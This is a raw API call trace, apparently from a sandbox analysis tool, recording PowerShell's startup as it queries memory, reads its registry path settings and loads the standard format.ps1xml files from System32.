	[0397.664] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.665] VirtualQuery (in: lpAddress=0x28c460, lpBuffer=0x28d320, dwLength=0x30 | out: lpBuffer=0x28d320*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.666] VirtualQuery (in: lpAddress=0x28c460, lpBuffer=0x28d320, dwLength=0x30 | out: lpBuffer=0x28d320*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.666] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.666] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.687] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.688] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.689] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.026] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0398.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.026] CoTaskMemFree (pv=0x147ca0) 
	[0398.031] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.040] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.040] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.042] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.042] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.044] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.044] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.044] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.045] VirtualQuery (in: lpAddress=0x28c450, lpBuffer=0x28d310, dwLength=0x30 | out: lpBuffer=0x28d310*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.047] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d908 | out: phkResult=0x28d908*=0x330) returned 0x0
	[0398.047] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d91c, lpData=0x0, lpcbData=0x28d918*=0x0 | out: lpType=0x28d91c*=0x1, lpData=0x0, lpcbData=0x28d918*=0x74) returned 0x0
	[0398.047] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d88c, lpData=0x0, lpcbData=0x28d888*=0x0 | out: lpType=0x28d88c*=0x1, lpData=0x0, lpcbData=0x28d888*=0x74) returned 0x0
	[0398.047] CoTaskMemAlloc (cb=0x78) returned 0x126430
	[0398.047] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d85c, lpData=0x126430, lpcbData=0x28d858*=0x74 | out: lpType=0x28d85c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d858*=0x74) returned 0x0
	[0398.047] CoTaskMemFree (pv=0x126430) 
	[0398.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0398.047] SetErrorMode (uMode=0x1) returned 0x1
	[0398.047] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0398.047] SetErrorMode (uMode=0x1) returned 0x1
	[0398.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.048] SetErrorMode (uMode=0x1) returned 0x1
	[0398.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0398.048] SetErrorMode (uMode=0x1) returned 0x1
	[0398.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.048] SetErrorMode (uMode=0x1) returned 0x1
	[0398.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0398.048] SetErrorMode (uMode=0x1) returned 0x1
	[0398.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.049] SetErrorMode (uMode=0x1) returned 0x1
	[0398.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0398.049] SetErrorMode (uMode=0x1) returned 0x1
	[0398.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.049] SetErrorMode (uMode=0x1) returned 0x1
	[0398.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0398.049] SetErrorMode (uMode=0x1) returned 0x1
	[0398.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0398.049] SetErrorMode (uMode=0x1) returned 0x1
	[0398.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0398.049] SetErrorMode (uMode=0x1) returned 0x1
	[0398.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0398.050] SetErrorMode (uMode=0x1) returned 0x1
	[0398.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0398.050] SetErrorMode (uMode=0x1) returned 0x1
	[0398.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0398.050] SetErrorMode (uMode=0x1) returned 0x1
	[0398.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0398.050] SetErrorMode (uMode=0x1) returned 0x1
	[0398.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0398.050] SetErrorMode (uMode=0x1) returned 0x1
	[0398.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0398.051] SetErrorMode (uMode=0x1) returned 0x1
	[0398.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0398.051] SetErrorMode (uMode=0x1) returned 0x1
	[0398.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7e0 | out: lpFileInformation=0x28d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0398.051] SetErrorMode (uMode=0x1) returned 0x1
	[0398.051] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0398.051] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.051] CoTaskMemFree (pv=0x147ca0) 
	[0398.055] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0398.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.055] CoTaskMemFree (pv=0x147ca0) 
	[0398.057] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0398.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.057] CoTaskMemFree (pv=0x147ca0) 
	[0398.059] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0398.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.059] CoTaskMemFree (pv=0x147ca0) 
	[0398.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.060] SetErrorMode (uMode=0x1) returned 0x1
	[0398.060] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0398.060] GetFileType (hFile=0x304) returned 0x1
	[0398.060] SetErrorMode (uMode=0x1) returned 0x1
	[0398.060] GetFileType (hFile=0x304) returned 0x1
	[0398.060] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.062] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.063] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.063] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.063] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.063] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.064] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x9e2, lpOverlapped=0x0) returned 1
	[0398.064] ReadFile (in: hFile=0x304, lpBuffer=0x338d99a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338d99a*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0398.064] ReadFile (in: hFile=0x304, lpBuffer=0x338e450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x338e450*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0398.064] CloseHandle (hObject=0x304) returned 1
	[0398.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.064] SetErrorMode (uMode=0x1) returned 0x1
	[0398.064] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0398.064] SetErrorMode (uMode=0x1) returned 0x1
	[0398.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.065] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x304) returned 0x0
	[0398.065] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0398.065] CoTaskMemAlloc (cb=0x5a) returned 0x1b765cc0
	[0398.065] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1b765cc0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0398.065] CoTaskMemFree (pv=0x1b765cc0) 
	[0398.065] RegCloseKey (hKey=0x304) returned 0x0
	[0398.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.432] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x9a1d2b74, Data2=0xc1fa, Data3=0x47cd, Data4=([0]=0x85, [1]=0x35, [2]=0x74, [3]=0xe8, [4]=0x20, [5]=0x6d, [6]=0x1f, [7]=0x93))) returned 0x0
	[0398.444] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd4c0b6f8, Data2=0x8b3d, Data3=0x416d, Data4=([0]=0xa6, [1]=0x6c, [2]=0x61, [3]=0xa0, [4]=0xa8, [5]=0xf8, [6]=0x3b, [7]=0x6f))) returned 0x0
	[0398.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.446] SetErrorMode (uMode=0x1) returned 0x1
	[0398.446] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0398.446] GetFileType (hFile=0x304) returned 0x1
	[0398.447] SetErrorMode (uMode=0x1) returned 0x1
	[0398.447] GetFileType (hFile=0x304) returned 0x1
	[0398.447] ReadFile (in: hFile=0x304, lpBuffer=0x33b8fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b8fb8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.448] ReadFile (in: hFile=0x304, lpBuffer=0x33b8fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b8fb8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
